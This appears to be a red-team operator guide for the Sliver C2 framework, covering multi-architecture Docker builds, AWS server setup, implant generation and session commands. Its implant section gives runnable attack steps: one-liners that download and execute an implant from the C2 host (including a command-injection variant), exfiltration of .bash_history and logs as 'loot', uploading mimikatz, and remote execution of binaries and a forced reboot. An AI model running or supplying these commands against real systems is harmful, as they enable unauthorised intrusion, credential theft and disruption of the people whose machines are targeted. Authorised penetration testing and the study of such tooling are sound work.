This guide documents how to use the Sliver C2 framework - both containerized and direct installation. It covers Docker builds across architectures, server deployment, implant generation, and operational commands for effective penetration testing.
Environment Setup
First, let’s set up some variables we’ll use throughout this guide:
# Set your GitHub username
GITHUB_USER=l50
# Set container registry path
CONTAINER_REGISTRY=ghcr.io
Building and Pushing Multi-Architecture Sliver Container
Building for Multiple Architectures
First, build your base Sliver image:
# Build the base image
docker build --target production -t sliver .
Then build for each specific architecture:
# Build for ARM64
docker build --target production --platform linux/arm64 -t sliver:arm64 .
# Build for AMD64
docker build --target production --platform linux/amd64 -t sliver:amd64 .
Tagging Architecture-Specific Images
After building, tag both images for your registry:
# Tag ARM64 image (use the correct image ID from docker images)
docker tag [ARM64_IMAGE_ID] $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64
# Tag AMD64 image (use the correct image ID from docker images)
docker tag [AMD64_IMAGE_ID] $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64
Authenticating with GitHub Container Registry
# Authenticate with GitHub Container Registry
echo $GITHUB_TOKEN | docker login $CONTAINER_REGISTRY -u $GITHUB_USER --password-stdin
Pushing Architecture-Specific Images
# Push ARM64 image
docker push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64
# Push AMD64 image
docker push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64
Creating and Pushing Multi-Architecture Manifest
# Create multi-architecture manifest
docker manifest create $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
$CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64 \
$CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64
# (Optional) Add architecture annotations if needed
docker manifest annotate $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
$CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64 --arch arm64
docker manifest annotate $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
$CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64 --arch amd64
# Push the manifest to create the multi-architecture image
docker manifest push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest
Verifying Multi-Architecture Image
# Verify your manifest
docker manifest inspect $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest
Troubleshooting Permission Issues
If you receive a 403 Forbidden or permission_denied error when pushing:
Ensure your GitHub token has the proper package permissions:
write:packagesread:packagesdelete:packages
Update your token’s permissions using:
gh auth refresh --scopes write:packages,read:packages,delete:packages
This process creates a multi-architecture image at
$CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest that will automatically pull
the correct architecture version depending on the user’s system architecture.
Server Setup
Create server on AWS Ubuntu 20.04 instance
Start by getting the latest release:
wget $(curl -s https://api.github.com/repos/BishopFox/sliver/releases/latest | jq -r '.assets[].browser_download_url' | grep 'server_linux')
Next, install the required dependencies:
sudo apt-get install -y mingw-w64 binutils-mingw-w64 g++-mingw-w64
Next, unzip and run the server:
unzip sliver-server_linux.zip
chmod +x sliver-server
sudo ./sliver-server
Implant Operations
Prepare Environment
# Create directory for implants
mkdir -p implants
# Get public hostname
EC2_HOSTNAME=$(curl -s 169.254.169.254/latest/meta-data/public-hostname)
Generate Implants
Generate HTTPS implant for Linux
generate --http $EC2_HOSTNAME --save implants/linux_implant --skip-symbols --os linux
Generate HTTPS debug implant
generate --debug --http $EC2_HOSTNAME --save implants/debug_implant --skip-symbols --os linux
Generate MTLS implant for macOS
generate --mtls $EC2_HOSTNAME --save implants/mac_implant --skip-symbols --os mac
Start Listeners
# Start HTTPS listener on port 443
https -l 443
Transfer and Run the Implant
On the server, host the payload for 30 seconds:
pushd implants ; timeout 30 python3 -m http.server 8080 ; popd
On the target, grab and execute it:
wget http://$EC2_HOSTNAME:8080/linux_implant && chmod +x linux_implant && ./linux_implant
For command injection scenarios:
bash -c "cd /tmp && wget http://$EC2_HOSTNAME:8080/linux_implant && chmod +x linux_implant && ./linux_implant &"
Session Management
List and Manage Implants
# List generated implants
implants
# Delete specific implant
implants rm <implant_name>
List Active Jobs
jobs
Interact with Sessions
# Connect to a session
sessions -i <session_id>
# Get session information
info
# Get a shell on the target
shell
# Exit shell (follow with CTRL+D to return to C2 menu)
exit
File Operations
Download Files
# Download file to server directory
download /home/ubuntu/.bash_history
# Download file to specific location
download /var/log/cloud-init.log loot
Download and Extract Folders
# Download folder as compressed archive
download /path/to/folder loot/folder.tar.gz
# Extract the folder
gunzip < loot/folder.tar.gz | tar -xvf -
Upload Files
# Basic upload syntax
upload local_file remote_location
# Example: Upload mimikatz
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210511/mimikatz_trunk.zip
upload ~/tools/mimikatz_trunk.zip C:/Temp/mimikatz.zip
Command Execution
# Run a binary
execute C:/temp/evil.exe
# Run a system command
execute shutdown /r /t 0
Troubleshooting
View Error Logs
cat ~/.sliver/logs/sliver.log
Troubleshooting Multi-Architecture Manifest Creation
When creating a multi-architecture manifest, you might encounter this error:
ghcr.io/l50/sliver:arm64 is a manifest list
Problem
This error occurs when one of the images you’re trying to include in your manifest is already a manifest list rather than a simple image. Docker doesn’t allow nesting manifest lists directly.
Solution
Instead of referencing the tag, you need to reference the specific digest for each architecture:
- First, inspect the manifest list to find the digests for each architecture:
# Inspect the ARM64 manifest
docker manifest inspect $CONTAINER_REGISTRY/$GITHUB_USER/sliver:arm64
# Inspect the AMD64 manifest
docker manifest inspect $CONTAINER_REGISTRY/$GITHUB_USER/sliver:amd64
- Create your manifest using the specific digests:
# Create manifest with specific architecture digests
docker manifest create $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest \
$CONTAINER_REGISTRY/$GITHUB_USER/sliver@sha256:<arm64_specific_digest> \
$CONTAINER_REGISTRY/$GITHUB_USER/sliver@sha256:<amd64_specific_digest>
- Push the manifest:
# Push the manifest
docker manifest push $CONTAINER_REGISTRY/$GITHUB_USER/sliver:latest
When using the digest reference format, make sure to use the digest that corresponds to the specific architecture you want to include. In the manifest inspection output, look for the digest under the appropriate architecture platform entry.